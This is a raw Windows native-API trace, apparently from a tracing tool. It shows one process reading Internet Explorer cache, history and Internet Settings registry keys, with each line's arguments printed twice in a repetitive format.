 01919   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0F\0e\0e\0d\0s\0 \0C\0a\0c\0h\0e\0\0\0"}, 148, ) , Partial, 148, ... TitleIdx=0, Type=2, Data= (232, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0F\0e\0e\0d\0s\0 \0C\0a\0c\0h\0e\0\0\0"}, 148, ) }, 148, ) == 0x0
 01920   748   NtQueryValueKey  (232,  (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="f\0e\0e\0d\0p\0l\0a\0t\0:\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="f\0e\0e\0d\0p\0l\0a\0t\0:\0\0\0"}, 32, ) }, 32, ) == 0x0
 01921   748   NtQueryValueKey  (232,  (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="f\0e\0e\0d\0p\0l\0a\0t\0:\0\0\0"}, 32, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="f\0e\0e\0d\0p\0l\0a\0t\0:\0\0\0"}, 32, ) }, 32, ) == 0x0
 01922   748   NtQueryValueKey  (232,  (232, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0
 01923   748   NtQueryValueKey  (232,  (232, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01924   748   NtClose  (232, ... ) == 0x0
 01925   748   NtEnumerateKey  (236, 1, Basic, 288, ... {LastWrite={0x3124e1e0,0x1c877f6}, TitleIdx=0, Name= (236, 1, Basic, 288, ... {LastWrite={0x3124e1e0,0x1c877f6}, TitleIdx=0, Name="MSHist012008022520080226"}, 64, ) }, 64, ) == 0x0
 01926   748   NtOpenKey  (0xf, {24, 236, 0x40, 0, 0,  (0xf, {24, 236, 0x40, 0, 0, "MSHist012008022520080226"}, ... 232, ) }, ... 232, ) == 0x0
 01927   748   NtQueryValueKey  (232,  (232, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01928   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 01929   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 160, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\08\00\02\02\05\02\00\00\08\00\02\02\06\0\0\0"}, 160, ) , Partial, 160, ... TitleIdx=0, Type=2, Data= (232, "CachePath", Partial, 160, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\08\00\02\02\05\02\00\00\08\00\02\02\06\0\0\0"}, 160, ) }, 160, ) == 0x0
 01930   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 01931   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 160, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\08\00\02\02\05\02\00\00\08\00\02\02\06\0\0\0"}, 160, ) , Partial, 160, ... TitleIdx=0, Type=2, Data= (232, "CachePath", Partial, 160, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0L\0o\0c\0a\0l\0 \0S\0e\0t\0t\0i\0n\0g\0s\0\\0H\0i\0s\0t\0o\0r\0y\0\\0H\0i\0s\0t\0o\0r\0y\0.\0I\0E\05\0\\0M\0S\0H\0i\0s\0t\00\01\02\00\00\08\00\02\02\05\02\00\00\08\00\02\02\06\0\0\0"}, 160, ) }, 160, ) == 0x0
 01932   748   NtQueryValueKey  (232,  (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\08\00\02\02\05\02\00\00\08\00\02\02\06\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\08\00\02\02\05\02\00\00\08\00\02\02\06\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0
 01933   748   NtQueryValueKey  (232,  (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\08\00\02\02\05\02\00\00\08\00\02\02\06\0:\0 \0\0\0"}, 52, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data=":\02\00\00\08\00\02\02\05\02\00\00\08\00\02\02\06\0:\0 \0\0\0"}, 52, ) }, 52, ) == 0x0
 01934   748   NtQueryValueKey  (232,  (232, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\0 \0\0"}, 16, ) }, 16, ) == 0x0
 01935   748   NtQueryValueKey  (232,  (232, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\13\0\0\0"}, 16, ) }, 16, ) == 0x0
 01936   748   NtClose  (232, ... ) == 0x0
 01937   748   NtEnumerateKey  (236, 2, Basic, 288, ... {LastWrite={0x2030327f,0x1c7701e}, TitleIdx=0, Name= (236, 2, Basic, 288, ... {LastWrite={0x2030327f,0x1c7701e}, TitleIdx=0, Name="UserData"}, 32, ) }, 32, ) == 0x0
 01938   748   NtAllocateVirtualMemory  (-1, 1392640, 0, 4096, 4096, 4, ... 1392640, 4096, ) == 0x0
 01939   748   NtOpenKey  (0xf, {24, 236, 0x40, 0, 0,  (0xf, {24, 236, 0x40, 0, 0, "UserData"}, ... 232, ) }, ... 232, ) == 0x0
 01940   748   NtQueryValueKey  (232,  (232, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "CacheRepair", Partial, 144, ... TitleIdx=0, Type=4, Data="\0\0\0\0"}, 16, ) }, 16, ) == 0x0
 01941   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 01942   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0I\0n\0t\0e\0r\0n\0e\0t\0 \0E\0x\0p\0l\0o\0r\0e\0r\0\\0U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 148, ) , Partial, 148, ... TitleIdx=0, Type=2, Data= (232, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0I\0n\0t\0e\0r\0n\0e\0t\0 \0E\0x\0p\0l\0o\0r\0e\0r\0\\0U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 148, ) }, 148, ) == 0x0
 01943   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_BUFFER_OVERFLOW
 01944   748   NtQueryValueKey  (232,  (232, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0I\0n\0t\0e\0r\0n\0e\0t\0 \0E\0x\0p\0l\0o\0r\0e\0r\0\\0U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 148, ) , Partial, 148, ... TitleIdx=0, Type=2, Data= (232, "CachePath", Partial, 148, ... TitleIdx=0, Type=2, Data="%\0U\0S\0E\0R\0P\0R\0O\0F\0I\0L\0E\0%\0\\0A\0p\0p\0l\0i\0c\0a\0t\0i\0o\0n\0 \0D\0a\0t\0a\0\\0M\0i\0c\0r\0o\0s\0o\0f\0t\0\\0I\0n\0t\0e\0r\0n\0e\0t\0 \0E\0x\0p\0l\0o\0r\0e\0r\0\\0U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 148, ) }, 148, ) == 0x0
 01945   748   NtQueryValueKey  (232,  (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 30, ) }, 30, ) == 0x0
 01946   748   NtQueryValueKey  (232,  (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 30, ) , Partial, 144, ... TitleIdx=0, Type=1, Data= (232, "CachePrefix", Partial, 144, ... TitleIdx=0, Type=1, Data="U\0s\0e\0r\0D\0a\0t\0a\0\0\0"}, 30, ) }, 30, ) == 0x0
 01947   748   NtQueryValueKey  (232,  (232, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\350\3\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "CacheLimit", Partial, 144, ... TitleIdx=0, Type=4, Data="\350\3\0\0"}, 16, ) }, 16, ) == 0x0
 01948   748   NtQueryValueKey  (232,  (232, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\10\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (232, "CacheOptions", Partial, 144, ... TitleIdx=0, Type=4, Data="\10\0\0\0"}, 16, ) }, 16, ) == 0x0
 01949   748   NtClose  (232, ... ) == 0x0
 01950   748   NtEnumerateKey  (236, 3, Basic, 288, ... ) == STATUS_NO_MORE_ENTRIES
 01951   748   NtReleaseMutant  (184, ... 0x0, ) == 0x0
 01952   748   NtClose  (236, ... ) == 0x0
 01953   748   NtWaitForSingleObject  (188, 0, 0x0, ... ) == 0x0
 01954   748   NtReleaseMutant  (188, ... 0x0, ) == 0x0
 01955   748   NtWaitForSingleObject  (188, 0, 0x0, ... ) == 0x0
 01956   748   NtReleaseMutant  (188, ... 0x0, ) == 0x0
 01957   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01958   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01959   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01960   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01961   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01962   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01963   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01964   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 236, ) }, ... 236, ) == 0x0
 01965   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01966   748   NtOpenKey  (0x1, {24, 236, 0x40, 0, 0,  (0x1, {24, 236, 0x40, 0, 0, "RETRY_HEADERONLYPOST_ONCONNECTIONRESET"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01967   748   NtClose  (236, ... ) == 0x0
 01968   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01969   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01970   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 236, ) }, ... 236, ) == 0x0
 01971   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01972   748   NtOpenKey  (0x1, {24, 236, 0x40, 0, 0,  (0x1, {24, 236, 0x40, 0, 0, "FEATURE_BUFFERBREAKING_818408"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01973   748   NtClose  (236, ... ) == 0x0
 01974   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01975   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01976   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 236, ) }, ... 236, ) == 0x0
 01977   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01978   748   NtOpenKey  (0x1, {24, 236, 0x40, 0, 0,  (0x1, {24, 236, 0x40, 0, 0, "FEATURE_SKIP_POST_RETRY_ON_INTERNETWRITEFILE_KB895954"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01979   748   NtClose  (236, ... ) == 0x0
 01980   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01981   748   NtQueryValueKey  (156,  (156, "DisableWorkerThreadHibernation", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01982   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 01983   748   NtQueryValueKey  (236,  (236, "DisableWorkerThreadHibernation", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01984   748   NtClose  (236, ... ) == 0x0
 01985   748   NtQueryValueKey  (156,  (156, "DisableReadRange", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01986   748   NtQueryValueKey  (156,  (156, "SocketSendBufferLength", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01987   748   NtQueryValueKey  (156,  (156, "SocketReceiveBufferLength", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01988   748   NtQueryValueKey  (156,  (156, "KeepAliveTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01989   748   NtQueryValueKey  (156,  (156, "MaxHttpRedirects", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01990   748   NtQueryValueKey  (156,  (156, "MaxConnectionsPerServer", Partial, 144, ... TitleIdx=0, Type=4, Data="P\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (156, "MaxConnectionsPerServer", Partial, 144, ... TitleIdx=0, Type=4, Data="P\0\0\0"}, 16, ) }, 16, ) == 0x0
 01991   748   NtQueryValueKey  (156,  (156, "MaxConnectionsPer1_0Server", Partial, 144, ... TitleIdx=0, Type=4, Data="P\0\0\0"}, 16, ) , Partial, 144, ... TitleIdx=0, Type=4, Data= (156, "MaxConnectionsPer1_0Server", Partial, 144, ... TitleIdx=0, Type=4, Data="P\0\0\0"}, 16, ) }, 16, ) == 0x0
 01992   748   NtQueryValueKey  (156,  (156, "ServerInfoTimeout", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01993   748   NtQueryValueKey  (156,  (156, "ConnectTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01994   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 01995   748   NtQueryValueKey  (236,  (236, "ConnectTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01996   748   NtClose  (236, ... ) == 0x0
 01997   748   NtQueryValueKey  (156,  (156, "ConnectRetries", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 01998   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 01999   748   NtQueryValueKey  (236,  (236, "ConnectRetries", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02000   748   NtClose  (236, ... ) == 0x0
 02001   748   NtQueryValueKey  (156,  (156, "SendTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02002   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 02003   748   NtQueryValueKey  (236,  (236, "SendTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02004   748   NtClose  (236, ... ) == 0x0
 02005   748   NtQueryValueKey  (156,  (156, "ReceiveTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02006   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... 236, ) }, ... 236, ) == 0x0
 02007   748   NtQueryValueKey  (236,  (236, "ReceiveTimeOut", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02008   748   NtClose  (236, ... ) == 0x0
 02009   748   NtQueryValueKey  (156,  (156, "DisableNTLMPreAuth", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02010   748   NtQueryValueKey  (156,  (156, "ScavengeCacheLowerBound", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02011   748   NtQueryValueKey  (156,  (156, "CertCacheNoValidate", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02012   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 236, ) }, ... 236, ) == 0x0
 02013   748   NtQueryValueKey  (236,  (236, "ScavengeCacheFileLifeTime", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02014   748   NtClose  (236, ... ) == 0x0
 02015   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02016   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02017   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02018   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 236, ) }, ... 236, ) == 0x0
 02019   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache"}, ... 232, ) }, ... 232, ) == 0x0
 02020   748   NtQueryValueKey  (232,  (232, "ScavengeCacheFileLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02021   748   NtQueryValueKey  (236,  (236, "ScavengeCacheFileLimit", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02022   748   NtClose  (236, ... ) == 0x0
 02023   748   NtClose  (232, ... ) == 0x0
 02024   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02025   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02026   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 232, ) }, ... 232, ) == 0x0
 02027   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02028   748   NtOpenKey  (0x1, {24, 232, 0x40, 0, 0,  (0x1, {24, 232, 0x40, 0, 0, "FEATURE_FIX_CHUNKED_PROXY_SCRIPT_DOWNLOAD_KB843289"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02029   748   NtClose  (232, ... ) == 0x0
 02030   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02031   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02032   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 232, ) }, ... 232, ) == 0x0
 02033   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02034   748   NtOpenKey  (0x1, {24, 232, 0x40, 0, 0,  (0x1, {24, 232, 0x40, 0, 0, "FEATURE_USE_CNAME_FOR_SPN_KB911149"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02035   748   NtClose  (232, ... ) == 0x0
 02036   748   NtQueryValueKey  (156,  (156, "HttpDefaultExpiryTimeSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02037   748   NtQueryValueKey  (156,  (156, "FtpDefaultExpiryTimeSecs", Partial, 144, ... ) , Partial, 144, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02038   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02039   748   NtOpenKey  (0x1, {24, 56, 0x40, 0, 0,  (0x1, {24, 56, 0x40, 0, 0, "Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl"}, ... ) }, ... ) == STATUS_OBJECT_NAME_NOT_FOUND
 02040   748   NtOpenKey  (0x1, {24, 16, 0x40, 0, 0,  (0x1, {24, 16, 0x40, 0, 0, "Software\Microsoft\Internet Explorer\Main\FeatureControl"}, ... 232, ) }, ... 232, ) == 0x0
